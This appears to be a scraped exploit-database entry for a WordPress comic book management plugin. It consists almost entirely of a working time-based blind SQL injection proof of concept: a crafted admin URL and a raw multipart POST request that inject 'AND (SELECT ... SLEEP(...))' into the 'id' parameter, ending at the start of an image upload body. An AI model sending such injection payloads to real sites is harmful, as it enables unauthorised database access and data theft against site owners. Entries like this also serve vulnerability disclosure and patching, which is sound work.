## https://sploitus.com/exploit?id=WPEX-ID:C0F5CF61-B3E2-440F-A185-61DF360C1192
https://example.com/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)


POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707
Content-Length: 733
Origin: http://localhost:8080
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="id"

2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf)
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png"
Content-Type: image/png

‰PNG